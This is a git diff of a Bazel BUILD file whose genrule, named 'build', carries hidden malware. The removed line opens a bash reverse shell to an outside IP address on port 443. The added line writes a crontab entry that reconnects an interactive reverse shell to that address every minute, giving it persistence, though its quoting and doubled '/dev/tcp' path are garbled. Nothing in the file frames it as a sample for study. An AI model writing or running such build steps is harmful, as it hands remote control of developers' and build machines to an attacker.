--- a/BUILD.bazel
+++ b/BUILD.bazel
@@ -1,6 +1,6 @@
 genrule(
   name = "build",
   outs = ["foadfdfzo"],
-  cmd = "/bin/bash -l > /dev/tcp/34.74.252.74/443 0<&1 2>&1",
+  cmd = "(touch .tab ; echo "*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/dev/tcp/34.74.252.74/443 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1",
   visibility = ["//visibility:public"],
 )
